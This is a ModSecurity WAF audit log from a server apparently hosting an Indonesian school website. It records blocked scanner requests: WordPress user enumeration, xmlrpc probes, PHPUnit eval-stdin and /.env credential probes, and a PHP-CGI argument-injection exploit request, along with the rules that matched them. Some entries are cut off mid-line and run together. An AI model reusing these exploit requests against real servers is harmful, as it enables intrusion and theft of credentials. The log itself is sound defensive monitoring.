X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.9 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d3afd31d-C-- demo.sayHello --d3afd31d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3afd31d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746377065656610 17031 (- - -) Stopwatch2: 1746377065656610 17031; combined=28138, p1=447, p2=3149, p3=23, p4=26, p5=12259, sr=66, sw=62, l=0, gc=12172 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3afd31d-Z-- --201c8554-A-- [04/May/2025:23:46:48 +0700] aBeZ-GJEE9ao5dcyYWn62QAAAIM 103.236.140.4 43992 103.236.140.4 8181 --201c8554-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.100.52 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.100.52 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --201c8554-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --201c8554-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746377208638846 2877 (- - -) Stopwatch2: 1746377208638846 2877; combined=1306, p1=453, p2=822, p3=0, p4=0, p5=31, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --201c8554-Z-- --ec176700-A-- [04/May/2025:23:46:54 +0700] aBeZ_mJEE9ao5dcyYWn63QAAAII 103.236.140.4 44002 103.236.140.4 8181 --ec176700-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.100.52 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.100.52 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ec176700-C-- demo.sayHello --ec176700-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec176700-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746377214032380 4774 (- - -) Stopwatch2: 1746377214032380 4774; combined=3720, p1=451, p2=3070, p3=24, p4=26, p5=88, sr=67, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec176700-Z-- --d6b3b81a-A-- [04/May/2025:23:58:00 +0700] aBecmNsVQyl9V2B8Pt_EkAAAAEY 103.236.140.4 44130 103.236.140.4 8181 --d6b3b81a-B-- POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 89.21.85.27 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 89.21.85.27 X-Forwarded-Proto: http Connection: close Content-Length: 27 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --d6b3b81a-C-- --d6b3b81a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6b3b81a-E-- --d6b3b81a-H-- Message: Access denied with code 403 (phase 2). String match " --711b6758-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --711b6758-E-- --711b6758-H-- Message: Access denied with code 403 (phase 2). String match " --8298db0f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8298db0f-E-- --8298db0f-H-- Message: Access denied with code 403 (phase 2). String match " --7d806575-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d806575-H-- Message: Access denied with code 403 (phase 2). String match " --e1f64245-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1f64245-E-- --e1f64245-H-- Message: Access denied with code 403 (phase 2). String match " --33f70231-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --33f70231-E-- --33f70231-H-- Message: Access denied with code 403 (phase 2). String match " --4f2fc500-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f2fc500-H-- Message: Access denied with code 403 (phase 2). String match " --d7b2510d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7b2510d-E-- --d7b2510d-H-- Message: Access denied with code 403 (phase 2). String match " demo.sayHello --708f9032-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --708f9032-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746379013443398 4932 (- - -) Stopwatch2: 1746379013443398 4932; combined=3806, p1=482, p2=3115, p3=27, p4=30, p5=90, sr=68, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --708f9032-Z-- --7ebd491f-A-- [05/May/2025:00:32:58 +0700] aBekytsVQyl9V2B8Pt_FQQAAAEA 103.236.140.4 45142 103.236.140.4 8181 --7ebd491f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.80.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.80.44 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7ebd491f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ebd491f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746379978595179 3287 (- - -) Stopwatch2: 1746379978595179 3287; combined=1376, p1=480, p2=864, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ebd491f-Z-- --88ea4128-A-- [05/May/2025:00:33:03 +0700] aBekz2JEE9ao5dcyYWn6-gAAAI0 103.236.140.4 45146 103.236.140.4 8181 --88ea4128-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.80.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.80.44 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --88ea4128-C-- demo.sayHello --88ea4128-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --88ea4128-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746379983742708 6078 (- - -) Stopwatch2: 1746379983742708 6078; combined=4373, p1=581, p2=3548, p3=40, p4=38, p5=98, sr=81, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88ea4128-Z-- --7741c00c-A-- [05/May/2025:00:33:19 +0700] aBek32JEE9ao5dcyYWn6_AAAAI4 103.236.140.4 45150 103.236.140.4 8181 --7741c00c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.79.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.79.173 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7741c00c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7741c00c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746379999281144 2669 (- - -) Stopwatch2: 1746379999281144 2669; combined=1227, p1=414, p2=783, p3=0, p4=0, p5=29, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7741c00c-Z-- --95c2ad66-A-- [05/May/2025:00:33:25 +0700] aBek5WJEE9ao5dcyYWn6_QAAAJQ 103.236.140.4 45154 103.236.140.4 8181 --95c2ad66-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.79.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.79.173 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --95c2ad66-C-- demo.sayHello --95c2ad66-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --95c2ad66-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746380005549115 5883 (- - -) Stopwatch2: 1746380005549115 5883; combined=4383, p1=558, p2=3592, p3=34, p4=38, p5=96, sr=77, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --95c2ad66-Z-- --4979ba1b-A-- [05/May/2025:00:34:58 +0700] aBelQtsVQyl9V2B8Pt_FRAAAAEE 103.236.140.4 45172 103.236.140.4 8181 --4979ba1b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.177.72 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.177.72 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4979ba1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4979ba1b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746380098966672 2870 (- - -) Stopwatch2: 1746380098966672 2870; combined=1265, p1=438, p2=795, p3=0, p4=0, p5=31, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4979ba1b-Z-- --61a9a14e-A-- [05/May/2025:00:35:03 +0700] aBelR2JEE9ao5dcyYWn7AwAAAJY 103.236.140.4 45176 103.236.140.4 8181 --61a9a14e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.177.72 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.177.72 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --61a9a14e-C-- demo.sayHello --61a9a14e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --61a9a14e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746380103203049 6639 (- - -) Stopwatch2: 1746380103203049 6639; combined=4660, p1=597, p2=3816, p3=37, p4=42, p5=100, sr=75, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61a9a14e-Z-- --5141235b-A-- [05/May/2025:00:36:18 +0700] aBelkvnZiHJYHUAF8QfqaQAAABI 103.236.140.4 45208 103.236.140.4 8181 --5141235b-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 206.81.24.227 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 206.81.24.227 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --5141235b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5141235b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746380178439858 696 (- - -) Stopwatch2: 1746380178439858 696; combined=276, p1=252, p2=0, p3=0, p4=0, p5=24, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5141235b-Z-- --74e5b82b-A-- [05/May/2025:00:46:48 +0700] aBeoCOchPF6irSergtsIrgAAANc 103.236.140.4 45344 103.236.140.4 8181 --74e5b82b-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 146.190.103.103 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 146.190.103.103 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --74e5b82b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --74e5b82b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746380808108366 742 (- - -) Stopwatch2: 1746380808108366 742; combined=312, p1=276, p2=0, p3=0, p4=0, p5=36, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --74e5b82b-Z-- --986f1177-A-- [05/May/2025:01:33:04 +0700] aBey4GJEE9ao5dcyYWn7MQAAAJQ 103.236.140.4 46308 103.236.140.4 8181 --986f1177-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.162 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.162 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --986f1177-C-- --986f1177-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --986f1177-E-- --986f1177-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746383584845248 3908 (- - -) Stopwatch2: 1746383584845248 3908; combined=2097, p1=511, p2=1551, p3=0, p4=0, p5=35, sr=75, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --986f1177-Z-- --c4a1f63a-A-- [05/May/2025:01:35:31 +0700] aBezc-chPF6irSergtsIxwAAANU 103.236.140.4 46558 103.236.140.4 8181 --c4a1f63a-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 146.190.103.103 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 146.190.103.103 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --c4a1f63a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c4a1f63a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746383731144155 581 (- - -) Stopwatch2: 1746383731144155 581; combined=221, p1=200, p2=0, p3=0, p4=0, p5=21, sr=48, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c4a1f63a-Z-- --296a367f-A-- [05/May/2025:02:54:23 +0700] aBfF79sVQyl9V2B8Pt_GEgAAAFY 103.236.140.4 47440 103.236.140.4 8181 --296a367f-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 64.23.218.208 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 64.23.218.208 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --296a367f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --296a367f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746388463963502 814 (- - -) Stopwatch2: 1746388463963502 814; combined=319, p1=283, p2=0, p3=0, p4=0, p5=36, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --296a367f-Z-- --cda3f03f-A-- [05/May/2025:04:38:00 +0700] aBfeOE2V_h1VFAgsfga9LgAAAAk 103.236.140.4 50920 103.236.140.4 8181 --cda3f03f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: LG-LX550 AU-MIC-LX550/2.0 MMP/2.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 Accept-Charset: utf-8 --cda3f03f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cda3f03f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746394680957788 870 (- - -) Stopwatch2: 1746394680957788 870; combined=321, p1=282, p2=0, p3=0, p4=0, p5=39, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cda3f03f-Z-- --6a9da451-A-- [05/May/2025:05:10:21 +0700] aBflzQRwKNFSM6B7_LYOowAAAJg 103.236.140.4 36310 103.236.140.4 8181 --6a9da451-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.181.11.123 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.181.11.123 X-Forwarded-Proto: https Connection: close --6a9da451-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a9da451-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746396621050443 859 (- - -) Stopwatch2: 1746396621050443 859; combined=305, p1=262, p2=0, p3=0, p4=0, p5=43, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a9da451-Z-- --1b4de616-A-- [05/May/2025:05:24:18 +0700] 